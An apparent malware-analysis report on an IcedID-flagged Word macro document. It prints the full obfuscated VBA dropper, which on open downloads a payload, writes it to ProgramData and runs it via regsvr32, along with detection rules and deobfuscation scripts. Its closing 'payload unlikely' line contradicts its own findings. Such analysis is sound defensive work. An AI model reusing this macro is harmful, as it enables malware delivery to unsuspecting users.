Verdict: MALICIOUS
Risk score: 290
Heuristics: 7
- [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- [medium] OOXML_VBA: VBA project inside OOXML. The document contains a VBA project (VBA macros present); 4 related findings.
- [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: Set oxbYr = CreateObject(KglVS + "." + "shell")
- [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: Set tMtBu = VBA.CreateObject(UMpgJ + "" + EKGtA)
- [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens. Triggers only on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents, where the visible VBA source is unavailable. The matched tokens are named in the finding's detail line.
- [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: Sub AutoOpen()
- [info] EMBEDDED_URL: Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in document text (OOXML body / shared strings) and are the XML namespace identifiers that every Word-generated OOXML file declares, so none of them is a network indicator. The macro's real download URL is not among them: it is assembled at run time from a shape's alternative text (see the extracted script).
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
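The pairing rule that the OLE_VBA_PCODE_AUTOEXEC_EXEC finding describes, as an added Python example that is not part of this report or of its analyzer: it scans raw VBA stream bytes for the two token classes and fires only when both classes are present in the same stream. The token lists are copied from the finding; the stream bytes are constructed stand-ins, not data from this sample, and the byte-level scan is a deliberate simplification of parsing the MS-OVBA record layout.

```python
import re

# Token lists copied from the OLE_VBA_PCODE_AUTOEXEC_EXEC description above.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream: bytes, tokens) -> list:
    """Return, in list order, the tokens that occur in a raw VBA stream.

    Identifier names in the compiled (p-code) and cache streams sit between
    non-identifier bytes, so a case-insensitive, word-bounded substring scan
    over the raw bytes is enough for this check. It ignores the MS-OVBA
    record structure, which a production rule would parse instead.
    """
    text = stream.decode("latin-1")          # 1:1 byte-to-char, never fails
    hits = []
    for tok in tokens:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pattern, text, re.IGNORECASE):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream: bytes) -> dict:
    """The pairing rule: fire only if an auto-exec entry point AND an
    execution/download token co-occur in the same stream."""
    autoexec = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"fires": bool(autoexec and execs),
            "autoexec": autoexec, "exec": execs}


# Constructed stand-ins for decoded VBA streams (not bytes from this sample):
# identifier names separated by the kind of binary filler p-code carries.
STREAM_PAIRED    = b"\x00\x07\x00AutoOpen\x00\x00\x0cCreateObject\x00\x05WinHttp\x00"
STREAM_AUTO_ONLY = b"\x00\x07\x00AutoOpen\x00\x00\x06MsgBox\x00"
STREAM_EXEC_ONLY = b"\x00\x0cCreateObject\x00\x05ShellExecute\x00"   # no entry point
STREAM_LOOKALIKE = b"\x00\x08\x00AutoOpen\x00\x09shellcode\x00"      # 'Shell' is not a whole word

if __name__ == "__main__":
    for name, s in [("paired", STREAM_PAIRED), ("auto-only", STREAM_AUTO_ONLY),
                    ("exec-only", STREAM_EXEC_ONLY), ("lookalike", STREAM_LOOKALIKE)]:
        print(name, pcode_autoexec_exec(s))
```

On a real file, `olefile.OleFileIO("vbaProject.bin")` with `listdir()` and `openstream()` yields the module streams and the `_VBA_PROJECT` cache stream to feed in. The rule exists for the case the finding names, a document whose source cannot be extracted, so it belongs on the raw streams; where decompressed source is available, OLE_VBA_AUTOOPEN and OLE_VBA_SHELL already cover the same evidence.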
Extracted artifacts: 2
Files carved from inside the sample during analysis.

Artifact 1: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 14087 bytes
SHA-256: 0230d0b97100a76ce6b2ff54bd2ac818475c97b8169aa8519c8e4ba4d43dbc8a

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QfNaW"
Sub jwEYR(rVzdy, Optional ByVal HuYbH As String = "c:\programdata\QZsRO.txt", Optional ByVal EKGtA As String = "systemobject")
' Vivaciously unawakened tarantula couples findable
' Ladders confirmatory afternoon unchristian habitability croqueted
' Shoddily sugars
' Comprehensibly dream matured yuppies suchlike coulombs mile
' Openminded elevates bituminous overshoots
' Apprehensively
' Nightingale
' Orate longwindedness
' Narration chokes backwoods guesswork
' Homoeopathy
' Unfaithful fans eddying
' Primaries
' Rowdily redhead squash
' Raccoons scribbles reaccept donga
' Muslim histograms
' Reconstituted
' Nudge selling discourtesy annulus
' Skullduggery
' Drawl apprehensive sculler turkeys
' Nursemaid three communicates
' Import calf
' Crusts corgis proclaimers botanical
' Hark
' Knuckles crummy rupert vaporise
' Appealed whodunnit rumple dutifully colluding inferior corrector
Set tMtBu = VBA.CreateObject(UMpgJ + "" + EKGtA)
' Passed erosive insensitivity
' Wetter lambda multiplies gall indecently
' Dancer degeneracies
' Conflagration omits dampness blouses reprise
Set ZszSA = tMtBu.CreateTextFile(HuYbH)
' Ornithology mountains mainsail
' Wigeon with roped overjoyed sincerely
' Turnovers depresses metabolise
' Vigour barmaid piecewise beadier
' Creel radiantly coital toed chaperone
' Darlings effect fishlike fearful
' Quondam schooldays
' Porridge bungle
ZszSA.WriteLine rVzdy
' Strictures rebelled bookies bobsled
' Racialism
' Unsatisfiable pursued daffodils continued resurgence
' Hydrangeas
' Foil videotapes
ZszSA.Close
' Whacko marquee kilt extinguishers
' Stopping reconfiguring distinctness
' Phew literate belles ripened closeness
' Involves adore
' Frijole streaming micro woods godlessness
' Slovenia anther libel
' Solvent censures morbidly unfrozen
' Manageress preheating leg
' Appointees whop gentling slayers
' Deviants waffles maggot ave fullblooded
' Alleges
' Uglier
' Magnetohydrodynamics screeds enthalpy welded
' Dismemberment reorientation trepidation proletarians rhetorician marshmallows agleam
' Adornments expositions ignore
' Carotene holdup
' Prance crunchers spectacular wages
' Pickled district tendency
' Bulldoze resorting funk dulcimer outraging jingled contemplated
' Testers annotates biochemist silts repined mountable
' Crater devote derision sotho
' Prong geometers fraud conjoined
' Hypnotises unstamped imprint energisers meeting
' Spicier
' Indirections recoiling unpractised fossa whizz
' Tabling reflects snivelling radishes
' Neuroscience workouts corner triumphed
' Consistency jurists remit licences
' Dane spattering commutativity
' Lyrist insisted soaps pulsating
' Counterparts attitude crossness
' Excusing sacrament hailed mutes sabretoothed terrifically
' Lazier scotches sneering victualling thuds inconsolably
' Cultivating topped
' Equilibration internationals memphis infeasibility
' Diffusers fiddled oppositions
' Internationalist prescribed jokes scoreless reaction pluperfect
End Sub
' Destine disappears marrow exploratory paschal
' Repute
' Prospering hydride hellfire remuneration
' Propulsive fillings azimuth involve coproduced monophthongs
Sub AutoOpen()
' Fallen introvert harvester
' Comatose tediousness obstetrics
' Aisle shuts onlookers summariser devise
' Capable underdeveloped lactation reviser
' Cardiovascular flashed learns votes
' Crusader rabbit builtin prayers bolstered broadminded
' Atomic gasworks
' Underwrite valley captains unregistered terracing holster
' Fiddling leftists
' Swallow revolt quake
' Limpopo devilled
' Informality hoarse panellist bowl
' Maturity dialectical brasilia
' Decimated loneliness positions
' Occipital halved enlighten swipe inquisition
' Precedence peril rasping redeveloped sinecures
' Lemon addicted
' Anonymous compromises maizes
' Duskier anthologies
' Discrepant consternation moaners isogram
' Wishfully bettered frosty
' Affectation inevitability stubbing koran
' Nonconformists triplets accuser
' Containment
' Overboard slaving structureless prehistoric installer
' Vouchsafing locational tombs
' Improbable apostles drabness curdle
' Underbody mellows
' Distributing issues prolix
' Overfull
Dim rlubY As New RihZD
' Enshroud invader audited
' Arrangeable perpendicular soldiered
' Foresight indicate scaffold
' Repudiate
' Doyens cocking abseiler
cTTMf = ""
' Bricks metre increment interred
' Derision
' Uncomfortably obedience
' Supranationalism pirate redoing dogeared
' Heavenward rediscussed startles enfranchiser
' Bauxite civilians floras byelaw decays
' Decapitations runts intonation transporting
' Unconsecrated surgeon syrups instigator scifi
' Circumstantially coquettishly sponsorships bluffs
' Flooding vulgarity
' Cruised
rVzdy = rlubY.GKQFH(KCzJG)
' Switches
' Lusher hydroxides footbridge upsetting olfactory gushed
' Utah tropically tannins
' Suitcase rooster victims slavic
' Snorkel mutuality
' Trickiest
jwEYR dGZht(rVzdy)
' Parades misfits sundries incapacitated extricating
' Gulfwar belts preponderant breadfruit
' Slobbering bluffing
' Funerary pointedly befuddling agriculturalist independence
' Elastodynamics matinees
' Arouse floozie
' Beastliness broths transaction rockier extrinsically
' Fraught skimmer magnetic daunting hydrangea astrally
' Documentary closeness
' Binomial generally girdle
' Recently harems
yGtOh NeMxm(0) + "vr32 c:\programdata\QZsRO.txt", "wscript"
End Sub
Function eGsbY(ytaNd, dWYhm)
' Sex
' Unleashes
' Earsplitting did
' Disillusioned mayoral
' Transplanted woodwind exaggerate swiftly
' Unmarried taxi maligning proprietors lowness
eGsbY = Split(ytaNd, dWYhm)
End Function
Attribute VB_Name = "buTGd"
' Carcinogenesis escarpment cliff challenged upgrading invalidates busts
' Appreciative
' Moonshine guest anthropological campanological
' Whirlwinds vertebrae intermissions husk rectifier
' Negotiators constructed reputation overruled
' Trumpery
Function dGZht(cHgqY)
' Birthmarks invented legacy forums concurred
' Luckless appendices
' Exterior fusillade
' Unevaluated implosion tautly tow
' Lamenter invigilating south
dGZht = StrConv(cHgqY, vbUnicode)
' Bolstered
' Shovelling tots temerity
' Busted engulfs architecturally
' Tramping
End Function
' Dispersion takeover brinkmanship
' Loans spearing mailmen perform inset
' Tracts munitions pined
' Leaderships
Function ENENb()
' Amorality disastrous freshest happier
' Beta
' Naomi nets brooms
' Diffused kittiwakes squealed meteors crevice
' Underfoot dakoits plug
' Entente superpower
' Thatcher realise raincloud
' Insulter bait pa memorise
' Piped retook wonderment subjugate
' Headscarves measurements sinecurist petrify
' Numeracy notices
With ActiveDocument.shapes(1)
ENENb = .AlternativeText
End With
End Function
' Snaring nitrous paining alaska
' Unendingly
' Eelworms
' Worshipful speculating frightens recasts unread
Function NeMxm(PbLkp)
' Italian records embryonal shrillest
' Reproducibly roundly
' Corroboratory spots floors forest prohibitionist
' Vinyls
' Abusiveness mutations
' Churchwardens knotty
' Minion strains thalamus
' Thus companionable matchable
' Motto guess whomever righting redirected fluff
wSJlz = eGsbY(ENENb(), "~~~")
PtpgR = wSJlz(PbLkp)
NeMxm = PtpgR
End Function
Attribute VB_Name = "RihZD"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function jFmMJ(gVZLv, agRdc, VFsqz)
' Monotheism
' Butchering hardiness sequence provocation
' Cult velar exiguous complained facers fettered
' Shirked refuelling henge historiography ballpen
' Empties
' Plunders jazz industrialise hedgehog
jFmMJ = Mid(gVZLv, agRdc, VFsqz)
End Function
Public Function kyRrv(DELDJ, GTKFR)
' Elder anthrax reabsorbed unalike
' Privileged thrall treasuring foretastes familiar generating
' Ecstatically neutered softened fancying
' Shuttlecock brainteasers
' Gleam pension mouth relocates acyclic
' Exchanged renders repopulated longlost glaze
' Dullest
' Abrasive gentry pageful periodical claptrap
' Cognition ruined pinheads county melting gyrates
' Watertight
' Acers bankruptcies
' Plying cocooned
' Courtyards pus hotrod
' Belongings locksmith lends explanatory chartering snatches
' Thermostatically twisted slouching monomial mortality
EAjIR = Trim(DELDJ)
For gIvuw = GTKFR To Len(EAjIR)
pReOh = jFmMJ(EAjIR, gIvuw, GTKFR) & pReOh
Next gIvuw
kyRrv = pReOh
End Function
' Cheering leftover judas turnover
' Probabilities gamblers champ sweepstake
' Optimising authors bunked
' Liferafts shops opprobrious premiers fluctuated placer
' Comet reappoint egret
' Whoever stews mailed authoring autopsies badged
' Spanker linnets retaliated warns linker
Function GKQFH(GLOtr)
' Undistinguished trowel
' Landless latter pesetas differentiation progenitor
' Pudding merrier mortalities
' Solidly realpolitik derates decriminalise instigate harbours
' Agencies hearer pave
Dim TLNWG As Object
' Vacations plurals style
' Caters bookshelves jingo phosphorescent sent immovability
' Dupe addenda
' Togs soccer internal enriching cookbook brazier
' Steadily
' Perfectly congressional garbs sniggering
' Actionable lamentations dichotomies
' Dessert tendered ethnical
' Bun brasilia treated zigzagged sac
Set TLNWG = CreateObject(kyRrv(GLOtr, 1) + "." + kyRrv(GLOtr, 1) + "Request.5.1")
' Eventing
' Ploughmen apples wholefood
' Recured rubbishing
' Bunglers footlights
' Septic
' Taxied wholesale barre salts
' Callously torrid deuteron reliance
' Deficit envies
' Rendered preposterous
' Ellipsoids swishy perverseness creationist
' Engulfs misanthropy downloads
' Typographer sunflower bloodshed
' Tinsel auks compartmentalised downsize stuff
' Mixups
' Veg authenticator
' Missing peter
' Surest
' Underpin rivalled
' Copes shells
' Lover leashed tattoo buyers
' Swallower allegory weal progresses
' Hydrophobic biosynthesis teased
' Quickly prizes rebelliousness impala demonstrated
' Flexes hummingbird
' Marmalade quincentenary compliance cosmetically
' Writing
' Polyps piecing reinforces
' Mullah boarder
WkFIS = NeMxm(1)
' Pocketed centre smallpox acceptably horsemen recantation
' Gilding verify vacillation designedly sombrero
' Antrum maladjusted inconclusive athletic clairvoyance
' Prussia grilled remoteness milt ghostlike unexpired
' Enclosing vindicate graphs
' Dreadfulness bivalves
TLNWG.Open "GET", kyRrv(WkFIS, 1), False
' Pundits dovetails loftiness silicate mileposts paving bus
' Sets superfluously belatedly
' Observatory
' Marriageable whittled mullahs
' Squeamishness communitarian lodestar
' Fears mastoid salient
TLNWG.Send
' Gridded slackest scratchings morn
' Instrumentality balustrade denying scherzo
' Livening evangelising facilitation
' Backwoodsmen befog outwork mahatma
' Sarcophagus sledding buttonholed denatured
' Jolts recaps incredulity undereducated correcting recovery clashing
GKQFH = TLNWG.responsebody
End Function
Attribute VB_Name = "tUqbz"
Public Const KCzJG As String = "ptthniw"
Public Const UMpgJ As String = "scripting.file"
Sub yGtOh(cwwZl, KglVS)
' Syncopated collar accost testaments
' Welloff jap performs
' Leniency agglomeration stalin sloppily
' Isometry revenged pebbled magnesia
' Charmer orbs scarlets
' Nebulas
' Walkabouts
Set oxbYr = CreateObject(KglVS + "." + "shell")
' Proofed milligrams
' Woodenly excavators duo princely
' Dispiriting eigenfunctions isothermally inaction zinc
' Beryllium titres
' Wrist searchlight pursue
' Punters amino gaucheness ligaturing blackballing
' Dilapidated canton justifiability inoperative incinerator
' Disestablishing paunch telly witchdoctor turbot
' Aniseeds opiate vitamin
' Escapes
' Auxiliaries loo caster outperforming scrooge resurrected
' Analogously chivvied tagged
' Reassigns auger scything spurn stake
' Christ muffle millipedes predicative lemon attuned hypersensitivity
' Mistakenly basque phoenix actuated
' Dustman necrophiliac empires shamefacedly
' Osteoarthritis
' Redeems discounts ulster cogitated soundlessly rehabilitated conspicuous woolly
' Sectarian tarring perambulations jailed
' Beginner miscomprehended revolve
' Scantier perpendicular bosons
' Prosperity breastfeed
' Wellfounded compensates reconstituted guidelines flyhalf unenthusiastic components
' Micron elevator navigate rulers
' Thieved zebra exclude
' Spicier certainties snips snip
' Mimeographed intercollegiate injured spews
' Thane coiner
' Beryllium undereducated strongroom
' Waterwheel serenade immaturity
' Platypuses restriction
' Hospitable knitters tropical mappings bookmaking
' Plato hypnotic ferment cheats prosperous enigmas renewable coagulate
' Deformation messed valley abound
' Dismembered congratulatory announcing vehemence
' Secedes pulpit caverns crucifying coterie
' Decree agonise blind
' Brewer differencing squall ineffectively resolved
' Bowie tenuous partiality
' Peseta relationships shafted
' Adhesiveness augustus syphon analyst
' Chevalier cumulative afghans relighting cheats
' Flourishing dynast inaugurates notable
' Seattle pies entrancing treasurers impolite
' Fibrillation tuning getting
' Chivalric angry consorts headmistresses
Call oxbYr.exec(cwwZl)
' Con ballistic
' Disobeying incised handgun rolled factotum
' Implies flute tappers scythes crayon jotted tasks
' Corporeally derivatives
' Morphogenesis radiologists alcove
End Sub
Artifact 2: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 49664 bytes
SHA-256: a3c07a42ff6cb159b8682623884a69bc89ccee32d30795bcaa9994e6c4fd83ea
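Static resolution of the extracted macro's string helpers, as an added Python example that is not part of this report: a port of kyRrv(), which with the only argument the macro ever passes (1) reverses a string, resolves the three CreateObject ProgIDs from the constants shown in the modules above, and the "~~~" split that AutoOpen() applies to the first shape's AlternativeText is replayed to recover the GET URL and the command line. The report does not reproduce the shape's alternative text, so the document.xml fragment and the alt-text value below are constructed stand-ins: the "regs" prefix is an assumption chosen to fit the macro's literal "vr32 " suffix and the URL is a placeholder on example.com. The mapping of Shape.AlternativeText to the descr attribute of wp:docPr is my assumption about Word's file format, not a statement from the report.

```python
import xml.etree.ElementTree as ET
import zipfile

# Constants exactly as they appear in the extracted modules.
KCzJG = "ptthniw"                         # Public Const, module tUqbz
UMpgJ = "scripting.file"                  # Public Const, module tUqbz
EKGtA_DEFAULT = "systemobject"            # default for jwEYR's Optional EKGtA
DROP_PATH = r"c:\programdata\QZsRO.txt"   # default for jwEYR's Optional HuYbH

# wp: namespace of the drawing anchors in word/document.xml (it is in the URL list above).
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"


def kyRrv(s: str, start: int = 1) -> str:
    """Port of RihZD.kyRrv: Trim, then for i = start..Len prepend Mid(s, i, start).
    Every call in the macro passes start = 1, so it is a plain string reversal."""
    s = s.strip(" ")                      # VBA Trim strips spaces only
    out = ""
    for i in range(start, len(s) + 1):
        out = s[i - 1:i - 1 + start] + out
    return out


def resolved_progids() -> dict:
    """The three CreateObject() targets, built the way each routine builds them."""
    http = kyRrv(KCzJG, 1)                                # "winhttp"
    return {
        "GKQFH": http + "." + http + "Request.5.1",       # downloader
        "jwEYR": UMpgJ + "" + EKGtA_DEFAULT,              # file writer
        "yGtOh": "wscript" + "." + "shell",               # launcher (KglVS = "wscript")
    }


def shape_alt_texts(document_xml: str) -> list:
    """descr= of every wp:docPr in word/document.xml, in document order.
    Assumption (mine, not the report's): this is what Word returns as
    Shape.AlternativeText, so ActiveDocument.shapes(1) is index 0 here."""
    root = ET.fromstring(document_xml)
    return [el.get("descr", "") for el in root.iter("{%s}docPr" % WP_NS)]


def shape_alt_texts_from_docx(path: str) -> list:
    """Same, read straight out of a .docx container."""
    with zipfile.ZipFile(path) as z:
        return shape_alt_texts(z.read("word/document.xml").decode("utf-8"))


def resolve_alt_text(alt_text: str) -> dict:
    """Replay AutoOpen(): NeMxm(1) reversed is the GET URL handed to GKQFH,
    NeMxm(0) is the head of the command line handed to yGtOh."""
    fields = alt_text.split("~~~")        # eGsbY(ENENb(), "~~~")
    if len(fields) < 2:
        raise ValueError("alt text lacks the ~~~ separator the macro expects")
    return {
        "url": kyRrv(fields[1], 1),
        "command": fields[0] + "vr32 " + DROP_PATH,
    }


# Constructed document.xml fragment: the real sample's alt text is not in the
# report. "regs" is assumed to fit the literal "vr32 " suffix; the URL is a placeholder.
SAMPLE_DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:wp="%s"><w:body><w:p><w:r><w:drawing><wp:inline>'
    '<wp:docPr id="1" name="Picture 1" descr="regs~~~lld.daolyap/moc.elpmaxe//:ptth"/>'
    '</wp:inline></w:drawing></w:r></w:p></w:body></w:document>' % WP_NS
)


def resolve_sample() -> dict:
    return resolve_alt_text(shape_alt_texts(SAMPLE_DOCUMENT_XML)[0])


if __name__ == "__main__":
    print(resolved_progids())
    print(resolve_sample())
```

Point `shape_alt_texts_from_docx()` at the original .docx to get the real field values; everything the macro needs at run time (URL and the start of the command) lives in that alt text rather than in the VBA, which is why no network indicator appears in the URL list above. The drop path c:\programdata\QZsRO.txt and the "vr32 " suffix are literals in the script and need no recovery.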
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely